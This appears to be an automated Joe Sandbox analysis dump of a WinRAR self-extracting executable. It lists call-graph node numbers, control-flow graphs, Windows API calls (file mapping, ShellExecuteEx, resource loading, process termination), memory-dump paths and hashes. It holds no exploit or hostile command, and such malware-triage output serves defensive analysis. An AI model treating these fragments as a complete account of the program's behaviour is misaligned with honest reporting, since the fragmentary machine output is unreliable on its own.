24923->24925 24924->24927 24925->24922 24926 473c02 FreeLibrary 24925->24926 24926->24922 24927->24922 24927->24923 24928 473bd5 LoadLibraryExW 24927->24928 24928->24925 24928->24927 24930 473c0d ___vcrt_InitializeCriticalSectionEx 5 API calls 24929->24930 24931 473c71 24930->24931 24932 473c8a TlsAlloc 24931->24932 24933 472b96 24931->24933 24933->24902 24934 473d08 6 API calls ___vcrt_InitializeCriticalSectionEx 24933->24934 24934->24904 24935->24902 24939 47c077 24936->24939 24940 47c073 24936->24940 24937 46fbbc CatchGuardHandler 5 API calls 24938 46eefe 24937->24938 24938->24814 24938->24892 24939->24940 24942 47a6a0 24939->24942 24940->24937 24943 47a6ac ___scrt_is_nonwritable_in_current_image 24942->24943 24954 47ac31 EnterCriticalSection 24943->24954 24945 47a6b3 24955 47c528 24945->24955 24947 47a6c2 24948 47a6d1 24947->24948 24968 47a529 29 API calls 24947->24968 24970 47a6ed LeaveCriticalSection _abort 24948->24970 24951 47a6cc 24969 47a5df GetStdHandle GetFileType 24951->24969 24952 47a6e2 _abort 24952->24939 24954->24945 24956 47c534 ___scrt_is_nonwritable_in_current_image 24955->24956 24957 47c541 24956->24957 24958 47c558 24956->24958 24979 4791a8 20 API calls _free 24957->24979 24971 47ac31 EnterCriticalSection 24958->24971 24961 47c546 24980 479087 26 API calls __cftof 24961->24980 24963 47c550 _abort 24963->24947 24964 47c590 24981 47c5b7 LeaveCriticalSection _abort 24964->24981 24965 47c564 24965->24964 24972 47c479 24965->24972 24968->24951 24969->24948 24970->24952 24971->24965 24973 47b136 _unexpected 20 API calls 24972->24973 24978 47c48b 24973->24978 24974 47c498 24975 478dcc _free 20 API calls 24974->24975 24976 47c4ea 24975->24976 24976->24965 24977 47af0a 11 API calls 24977->24978 24978->24974 24978->24977 24979->24961 24980->24963 24981->24963 24983 46ec50 24982->24983 24984 46086d GetModuleHandleW 24983->24984 24985 4608e7 24984->24985 24986 460888 GetProcAddress 24984->24986 24987 460c14 GetModuleFileNameW 24985->24987 25079 4775fb 42 
API calls __vsnwprintf_l 24985->25079 24988 4608a1 24986->24988 24989 4608b9 GetProcAddress 24986->24989 24998 460c32 24987->24998 24988->24989 24991 4608cb 24989->24991 24991->24985 24992 460b54 24992->24987 24993 460b5f GetModuleFileNameW CreateFileW 24992->24993 24994 460b8f SetFilePointer 24993->24994 24995 460c08 CloseHandle 24993->24995 24994->24995 24996 460b9d ReadFile 24994->24996 24995->24987 24996->24995 25000 460bbb 24996->25000 25001 460c94 GetFileAttributesW 24998->25001 25003 460c5d CompareStringW 24998->25003 25004 460cac 24998->25004 25070 45b146 24998->25070 25073 46081b 24998->25073 25000->24995 25002 46081b 2 API calls 25000->25002 25001->24998 25001->25004 25002->25000 25003->24998 25005 460cb7 25004->25005 25008 460cec 25004->25008 25007 460cd0 GetFileAttributesW 25005->25007 25009 460ce8 25005->25009 25006 460dfb 25030 46a64d GetCurrentDirectoryW 25006->25030 25007->25005 25007->25009 25008->25006 25010 45b146 GetVersionExW 25008->25010 25009->25008 25011 460d06 25010->25011 25012 460d73 25011->25012 25013 460d0d 25011->25013 25014 454092 _swprintf 51 API calls 25012->25014 25015 46081b 2 API calls 25013->25015 25017 460d9b AllocConsole 25014->25017 25016 460d17 25015->25016 25018 46081b 2 API calls 25016->25018 25019 460df3 ExitProcess 25017->25019 25020 460da8 GetCurrentProcessId AttachConsole 25017->25020 25021 460d21 25018->25021 25080 473e13 25020->25080 25024 45e617 53 API calls 25021->25024 25023 460dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 25023->25019 25025 460d3c 25024->25025 25026 454092 _swprintf 51 API calls 25025->25026 25027 460d4f 25026->25027 25028 45e617 53 API calls 25027->25028 25029 460d5e 25028->25029 25029->25019 25030->24830 25032 46081b 2 API calls 25031->25032 25033 46ac2a OleInitialize 25032->25033 25034 46ac4d GdiplusStartup SHGetMalloc 25033->25034 25034->24832 25036 46b6fe 25035->25036 25037 46b70b GetObjectW 25035->25037 25082 46a6c2 FindResourceW 25036->25082 25041 46b71a 25037->25041 25040 46a5c6 4 API 
calls 25042 46b72d 25040->25042 25041->25040 25043 46b770 25042->25043 25044 46b74c 25042->25044 25046 46a6c2 13 API calls 25042->25046 25054 45da42 25043->25054 25098 46a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25044->25098 25048 46b73d 25046->25048 25047 46b754 25099 46a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25047->25099 25048->25044 25050 46b743 DeleteObject 25048->25050 25050->25044 25051 46b75d 25100 46a80c 8 API calls 25051->25100 25053 46b764 DeleteObject 25053->25043 25109 45da67 25054->25109 25059 4690b7 25060 46eb38 8 API calls 25059->25060 25061 4690d6 25060->25061 25061->24855 25063 46acab GdiplusShutdown CoUninitialize 25062->25063 25063->24870 25065->24839 25066->24854 25067->24834 25068->24860 25069->24869 25071 45b196 25070->25071 25072 45b15a GetVersionExW 25070->25072 25071->24998 25072->25071 25074 46ec50 25073->25074 25075 460828 GetSystemDirectoryW 25074->25075 25076 460840 25075->25076 25077 46085e 25075->25077 25078 460851 LoadLibraryW 25076->25078 25077->24998 25078->25077 25079->24992 25081 473e1b 25080->25081 25081->25023 25081->25081 25083 46a6e5 SizeofResource 25082->25083 25084 46a7d3 25082->25084 25083->25084 25085 46a6fc LoadResource 25083->25085 25084->25037 25084->25041 25085->25084 25086 46a711 LockResource 25085->25086 25086->25084 25087 46a722 GlobalAlloc 25086->25087 25087->25084 25088 46a73d GlobalLock 25087->25088 25089 46a7cc GlobalFree 25088->25089 25090 46a74c __InternalCxxFrameHandler 25088->25090 25089->25084 25091 46a754 CreateStreamOnHGlobal 25090->25091 25092 46a7c5 GlobalUnlock 25091->25092 25093 46a76c 25091->25093 25092->25089 25101 46a626 GdipAlloc 25093->25101 25096 46a79a GdipCreateHBITMAPFromBitmap 25097 46a7b0 25096->25097 25097->25092 25098->25047 25099->25051 25100->25053 25102 46a638 25101->25102 25104 46a645 25101->25104 25105 46a3b9 25102->25105 25104->25092 25104->25096 25104->25097 25106 46a3e1 GdipCreateBitmapFromStream 25105->25106 25107 46a3da GdipCreateBitmapFromStreamICM 25105->25107 
25108 46a3e6 25106->25108 25107->25108 25108->25104 25110 45da75 _wcschr __EH_prolog 25109->25110 25111 45daa4 GetModuleFileNameW 25110->25111 25112 45dad5 25110->25112 25113 45dabe 25111->25113 25155 4598e0 25112->25155 25113->25112 25115 45db31 25166 476310 25115->25166 25116 45959a 80 API calls 25118 45da4e 25116->25118 25117 45e261 78 API calls 25120 45db05 25117->25120 25153 45e29e GetModuleHandleW FindResourceW 25118->25153 25120->25115 25120->25117 25133 45dd4a 25120->25133 25121 45db44 25122 476310 26 API calls 25121->25122 25130 45db56 ___vcrt_InitializeCriticalSectionEx 25122->25130 25123 45dc85 25123->25133 25186 459d70 81 API calls 25123->25186 25125 459e80 79 API calls 25125->25130 25127 45dc9f ___std_exception_copy 25128 459bd0 82 API calls 25127->25128 25127->25133 25131 45dcc8 ___std_exception_copy 25128->25131 25130->25123 25130->25125 25130->25133 25180 459bd0 25130->25180 25185 459d70 81 API calls 25130->25185 25131->25133 25151 45dcd3 _wcslen ___std_exception_copy ___vcrt_InitializeCriticalSectionEx 25131->25151 25187 461b84 MultiByteToWideChar 25131->25187 25133->25116 25134 45e159 25141 45e1de 25134->25141 25193 478cce 26 API calls 2 library calls 25134->25193 25137 45e16e 25194 477625 26 API calls 2 library calls 25137->25194 25139 45e1c6 25195 45e27c 78 API calls 25139->25195 25140 45e214 25144 476310 26 API calls 25140->25144 25141->25140 25143 45e261 78 API calls 25141->25143 25143->25141 25145 45e22d 25144->25145 25146 476310 26 API calls 25145->25146 25146->25133 25149 461da7 WideCharToMultiByte 25149->25151 25151->25133 25151->25134 25151->25149 25188 45e5b1 50 API calls __vsnprintf 25151->25188 25189 476159 26 API calls 3 library calls 25151->25189 25190 478cce 26 API calls 2 library calls 25151->25190 25191 477625 26 API calls 2 library calls 25151->25191 25192 45e27c 78 API calls 25151->25192 25154 45da55 25153->25154 25154->25059 25156 4598ea 25155->25156 25157 45994b CreateFileW 25156->25157 25158 45996c GetLastError 25157->25158 
25162 4599bb 25157->25162 25159 45bb03 GetCurrentDirectoryW 25158->25159 25160 45998c 25159->25160 25161 459990 CreateFileW GetLastError 25160->25161 25160->25162 25161->25162 25164 4599b5 25161->25164 25163 4599ff 25162->25163 25165 4599e5 SetFileTime 25162->25165 25163->25120 25164->25162 25165->25163 25167 476349 25166->25167 25168 47634d 25167->25168 25179 476375 25167->25179 25196 4791a8 20 API calls _free 25168->25196 25170 476699 25172 46fbbc CatchGuardHandler 5 API calls 25170->25172 25171 476352 25197 479087 26 API calls __cftof 25171->25197 25174 4766a6 25172->25174 25174->25121 25175 47635d 25176 46fbbc CatchGuardHandler 5 API calls 25175->25176 25177 476369 25176->25177 25177->25121 25179->25170 25198 476230 5 API calls CatchGuardHandler 25179->25198 25181 459bdc 25180->25181 25183 459be3 25180->25183 25181->25130 25183->25181 25184 459785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 25183->25184 25199 456d1a 77 API calls 25183->25199 25184->25183 25185->25130 25186->25127 25187->25151 25188->25151 25189->25151 25190->25151 25191->25151 25192->25151 25193->25137 25194->25139 25195->25141 25196->25171 25197->25175 25198->25179 25199->25183 25201 477ce1 _unexpected 25200->25201 25202 477cfa 25201->25202 25203 477ce8 25201->25203 25224 47ac31 EnterCriticalSection 25202->25224 25236 477e2f GetModuleHandleW 25203->25236 25206 477ced 25206->25202 25237 477e73 GetModuleHandleExW 25206->25237 25207 477d9f 25225 477ddf 25207->25225 25210 477d01 25210->25207 25212 477d76 25210->25212 25245 4787e0 20 API calls _abort 25210->25245 25216 477d8e 25212->25216 25217 478a91 _abort 5 API calls 25212->25217 25214 477dbc 25228 477dee 25214->25228 25215 477de8 25246 482390 5 API calls CatchGuardHandler 25215->25246 25218 478a91 _abort 5 API calls 25216->25218 25217->25216 25218->25207 25224->25210 25247 47ac81 LeaveCriticalSection 25225->25247 25227 477db8 25227->25214 25227->25215 25248 47b076 25228->25248 25231 477e1c 25234 477e73 _abort 8 API calls 
25231->25234 25232 477dfc GetPEB 25232->25231 25233 477e0c GetCurrentProcess TerminateProcess 25232->25233 25233->25231 25235 477e24 ExitProcess 25234->25235 25236->25206 25238 477ec0 25237->25238 25239 477e9d GetProcAddress 25237->25239 25240 477ec6 FreeLibrary 25238->25240 25241 477ecf 25238->25241 25242 477eb2 25239->25242 25240->25241 25243 46fbbc CatchGuardHandler 5 API calls 25241->25243 25242->25238 25244 477cf9 25243->25244 25244->25202 25245->25212 25247->25227 25249 47b091 25248->25249 25250 47b09b 25248->25250 25252 46fbbc CatchGuardHandler 5 API calls 25249->25252 25251 47ac98 _unexpected 5 API calls 25250->25251 25251->25249 25253 477df8 25252->25253 25253->25231 25253->25232 25476 46b1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 25478 461bbd GetCPInfo IsDBCSLeadByte 25479 47b1b8 27 API calls 2 library calls

Control-flow Graph

APIs
  • Part of subcall function 00460863: GetModuleHandleW.KERNEL32(kernel32), ref: 0046087C
  • Part of subcall function 00460863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0046088E
  • Part of subcall function 00460863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 004608BF
  • Part of subcall function 0046A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0046A655
  • Part of subcall function 0046AC16: OleInitialize.OLE32(00000000), ref: 0046AC2F
  • Part of subcall function 0046AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0046AC66
  • Part of subcall function 0046AC16: SHGetMalloc.SHELL32(00498438), ref: 0046AC70
• GetCommandLineW.KERNEL32 ref: 0046DF5C
• OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0046DF83
• MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0046DF94
• UnmapViewOfFile.KERNEL32(00000000), ref: 0046DFCE
  • Part of subcall function 0046DBDE: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 0046DBF4
  • Part of subcall function 0046DBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0046DC30
• CloseHandle.KERNEL32(00000000), ref: 0046DFD7
• GetModuleFileNameW.KERNEL32(00000000,004AEC90,00000800), ref: 0046DFF2
• SetEnvironmentVariableW.KERNEL32(sfxname,004AEC90), ref: 0046DFFE
• GetLocalTime.KERNEL32(?), ref: 0046E009
• _swprintf.LIBCMT ref: 0046E048
• SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0046E05A
• GetModuleHandleW.KERNEL32(00000000), ref: 0046E061
• LoadIconW.USER32(00000000,00000064), ref: 0046E078
• DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 0046E0C9
                                                                  • Sleep.KERNEL32(?), ref: 0046E0F7
                                                                  • DeleteObject.GDI32 ref: 0046E130
                                                                  • DeleteObject.GDI32(?), ref: 0046E140
                                                                  • CloseHandle.KERNEL32 ref: 0046E183
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                  • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xzJ
                                                                  • API String ID: 3049964643-581230229
                                                                  • Opcode ID: 711cc69a291f68beff2f589b7df119c516ab661f026d250d3c9704791accc992
                                                                  • Instruction ID: c2ca003a4ce9173adf42e3020ebf189cb6507a4dc4c2652e24faa8f802fb6821
                                                                  • Opcode Fuzzy Hash: 711cc69a291f68beff2f589b7df119c516ab661f026d250d3c9704791accc992
                                                                  • Instruction Fuzzy Hash: 5661C471904205ABD320AF669C49B6B3BD8AB56B09F00043FF945922A1EB7C9944C76E

                                                                  Control-flow Graph

                                                                  control_flow_graph 888 46a6c2-46a6df FindResourceW 889 46a6e5-46a6f6 SizeofResource 888->889 890 46a7db 888->890 889->890 892 46a6fc-46a70b LoadResource 889->892 891 46a7dd-46a7e1 890->891 892->890 893 46a711-46a71c LockResource 892->893 893->890 894 46a722-46a737 GlobalAlloc 893->894 895 46a7d3-46a7d9 894->895 896 46a73d-46a746 GlobalLock 894->896 895->891 897 46a7cc-46a7cd GlobalFree 896->897 898 46a74c-46a76a call 470320 CreateStreamOnHGlobal 896->898 897->895 901 46a7c5-46a7c6 GlobalUnlock 898->901 902 46a76c-46a78e call 46a626 898->902 901->897 902->901 907 46a790-46a798 902->907 908 46a7b3-46a7c1 907->908 909 46a79a-46a7ae GdipCreateHBITMAPFromBitmap 907->909 908->901 909->908 910 46a7b0 909->910 910->908
                                                                  APIs
                                                                  • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0046B73D,00000066), ref: 0046A6D5
                                                                  • SizeofResource.KERNEL32(00000000,?,?,?,0046B73D,00000066), ref: 0046A6EC
                                                                  • LoadResource.KERNEL32(00000000,?,?,?,0046B73D,00000066), ref: 0046A703
                                                                  • LockResource.KERNEL32(00000000,?,?,?,0046B73D,00000066), ref: 0046A712
                                                                  • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0046B73D,00000066), ref: 0046A72D
                                                                  • GlobalLock.KERNEL32(00000000), ref: 0046A73E
                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0046A762
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0046A7C6
                                                                    • Part of subcall function 0046A626: GdipAlloc.GDIPLUS(00000010), ref: 0046A62C
                                                                  • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0046A7A7
                                                                  • GlobalFree.KERNEL32(00000000), ref: 0046A7CD
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                                  • String ID: PNG
                                                                  • API String ID: 211097158-364855578
                                                                  • Opcode ID: 06507778371d5ff818bb8fee5d6b60f20289adc9857036221290c2d5a8536376
                                                                  • Instruction ID: dc7768be72dc322dcc6acd9e91084d196f5ed0603d1bbc621c3c4e7864ba8766
                                                                  • Opcode Fuzzy Hash: 06507778371d5ff818bb8fee5d6b60f20289adc9857036221290c2d5a8536376
                                                                  • Instruction Fuzzy Hash: AC319375600702AFD7109F21EC88D1BBBB9EF84B52B04092FF80592621EB35DD54DF6A

                                                                  Control-flow Graph

                                                                  control_flow_graph 1040 45a69b-45a6bf call 46ec50 1043 45a727-45a730 FindNextFileW 1040->1043 1044 45a6c1-45a6ce FindFirstFileW 1040->1044 1046 45a742-45a7ff call 460602 call 45c310 call 4615da * 3 1043->1046 1047 45a732-45a740 GetLastError 1043->1047 1045 45a6d0-45a6e2 call 45bb03 1044->1045 1044->1046 1055 45a6e4-45a6fc FindFirstFileW 1045->1055 1056 45a6fe-45a707 GetLastError 1045->1056 1053 45a804-45a811 1046->1053 1049 45a719-45a722 1047->1049 1049->1053 1055->1046 1055->1056 1058 45a717 1056->1058 1059 45a709-45a70c 1056->1059 1058->1049 1059->1058 1061 45a70e-45a711 1059->1061 1061->1058 1063 45a713-45a715 1061->1063 1063->1049
                                                                  APIs
                                                                  • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0045A592,000000FF,?,?), ref: 0045A6C4
                                                                    • Part of subcall function 0045BB03: _wcslen.LIBCMT ref: 0045BB27
                                                                  • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0045A592,000000FF,?,?), ref: 0045A6F2
                                                                  • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0045A592,000000FF,?,?), ref: 0045A6FE
                                                                  • FindNextFileW.KERNEL32(?,?,?,?,?,?,0045A592,000000FF,?,?), ref: 0045A728
                                                                  • GetLastError.KERNEL32(?,?,?,?,0045A592,000000FF,?,?), ref: 0045A734
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                                  • String ID:
                                                                  • API String ID: 42610566-0
                                                                  • Opcode ID: 5d4a266f94322f013fb81f064610cba47d5addbc39637f822b48431aaea7f7ef
                                                                  • Instruction ID: 8b660e4662e534aba667caba4c5f8989625e675dbc5a53772ef48493cf7a5883
                                                                  • Opcode Fuzzy Hash: 5d4a266f94322f013fb81f064610cba47d5addbc39637f822b48431aaea7f7ef
                                                                  • Instruction Fuzzy Hash: 8741A332900115ABC715DF64CC88AEEB3B8FB48351F14029BE959E3201D738AEA4CF99
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32(00000000,?,00477DC4,00000000,0048C300,0000000C,00477F1B,00000000,00000002,00000000), ref: 00477E0F
                                                                  • TerminateProcess.KERNEL32(00000000,?,00477DC4,00000000,0048C300,0000000C,00477F1B,00000000,00000002,00000000), ref: 00477E16
                                                                  • ExitProcess.KERNEL32 ref: 00477E28
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: Process$CurrentExitTerminate
                                                                  • String ID:
                                                                  • API String ID: 1703294689-0
                                                                  • Opcode ID: 50cbeb7fb286196c91a4bbb022d3c3abf7a5aa5c06656794caff3d581f8a5261
                                                                  • Instruction ID: db0a4902a7c049e8c8903474bbdd1d2f544609dc1a12d38b0d813c71a4a00995
                                                                  • Opcode Fuzzy Hash: 50cbeb7fb286196c91a4bbb022d3c3abf7a5aa5c06656794caff3d581f8a5261
                                                                  • Instruction Fuzzy Hash: 46E04F31000244ABCF016F10CD09A8A3F69EB10786B408869F8098A232CB39DE91CB88
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2049223980.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                  • Associated: 00000000.00000002.2049195401.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049259269.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.0000000000495000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049281287.00000000004B2000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2049392447.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_450000_top.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog
                                                                  • String ID:
                                                                  • API String ID: 3519838083-0
                                                                  • Opcode ID: 79bb3698fe988f6169101c6697bfeaf4222bac0d44b036a8814d7ca22b235de4
                                                                  • Instruction ID: 3ac4ad068ecdfafb070f02e5ac336df28a2f74c47c7b667a676ea20fc162ecfe
                                                                  • Opcode Fuzzy Hash: 79bb3698fe988f6169101c6697bfeaf4222bac0d44b036a8814d7ca22b235de4
                                                                  • Instruction Fuzzy Hash: 1682F771904145AEDF15DB60C881BFAB7B9AF05305F0841BFEC49AB243DF285A8CCB69
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 0046B7E5
                                                                    • Part of subcall function 00451316: GetDlgItem.USER32(00000000,00003021), ref: 0045135A
                                                                    • Part of subcall function 00451316: SetWindowTextW.USER32(00000000,004835F4), ref: 00451370
                                                                  • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0046B8D1
                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0046B8EF
                                                                  • IsDialogMessageW.USER32(?,?), ref: 0046B902
                                                                  • TranslateMessage.USER32(?), ref: 0046B910
                                                                  • DispatchMessageW.USER32(?), ref: 0046B91A
                                                                  • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 0046B93D
                                                                  • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 0046B960
                                                                  • GetDlgItem.USER32(?,00000068), ref: 0046B983
                                                                  • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0046B99E
                                                                  • SendMessageW.USER32(00000000,000000C2,00000000,004835F4), ref: 0046B9B1
                                                                    • Part of subcall function 0046D453: _wcschr.LIBVCRUNTIME ref: 0046D45C
                                                                    • Part of subcall function 0046D453: _wcslen.LIBCMT ref: 0046D47D
                                                                  • SetFocus.USER32(00000000), ref: 0046B9B8
                                                                  • _swprintf.LIBCMT ref: 0046BA24
                                                                    • Part of subcall function 00454092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004540A5
                                                                    • Part of subcall function 0046D4D4: GetDlgItem.USER32(00000068,004AFCB8), ref: 0046D4E8
                                                                    • Part of subcall function 0046D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,0046AF07,00000001,?,?,0046B7B9,0048506C,004AFCB8,004AFCB8,00001000,00000000,00000000), ref: 0046D510
                                                                    • Part of subcall function 0046D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0046D51B
                                                                    • Part of subcall function 0046D4D4: SendMessageW.USER32(00000000,000000C2,00000000,004835F4), ref: 0046D529
                                                                    • Part of subcall function 0046D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0046D53F
                                                                    • Part of subcall function 0046D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0046D559
                                                                    • Part of subcall function 0046D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0046D59D
                                                                    • Part of subcall function 0046D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0046D5AB
                                                                    • Part of subcall function 0046D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0046D5BA
                                                                    • Part of subcall function 0046D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0046D5E1
                                                                    • Part of subcall function 0046D4D4: SendMessageW.USER32(00000000,000000C2,00000000,004843F4), ref: 0046D5F0
                                                                  • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 0046BA68
                                                                  • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 0046BA90
                                                                  • GetTickCount.KERNEL32 ref: 0046BAAE
                                                                  • _swprintf.LIBCMT ref: 0046BAC2
                                                                  • GetLastError.KERNEL32(?,00000011), ref: 0046BAF4
                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 0046BB43
                                                                  • _swprintf.LIBCMT ref: 0046BB7C
                                                                  • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 0046BBD0
                                                                  • GetCommandLineW.KERNEL32 ref: 0046BBEA
                                                                  • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 0046BC47
                                                                  • ShellExecuteExW.SHELL32(0000003C), ref: 0046BC6F
                                                                  • Sleep.KERNEL32(00000064), ref: 0046BCB9
                                                                  • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 0046BCE2
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0046BCEB
                                                                  • _swprintf.LIBCMT ref: 0046BD1E
                                                                  • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0046BD7D
                                                                  • SetDlgItemTextW.USER32(?,00000065,004835F4), ref: 0046BD94
                                                                  • GetDlgItem.USER32(?,00000065), ref: 0046BD9D
                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 0046BDAC
                                                                  • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0046BDBB
                                                                  • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0046BE68
                                                                  • _wcslen.LIBCMT ref: 0046BEBE
                                                                  • _swprintf.LIBCMT ref: 0046BEE8
                                                                  • SendMessageW.USER32(?,00000080,00000001,?), ref: 0046BF32
                                                                  • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 0046BF4C
                                                                  • GetDlgItem.USER32(?,00000068), ref: 0046BF55
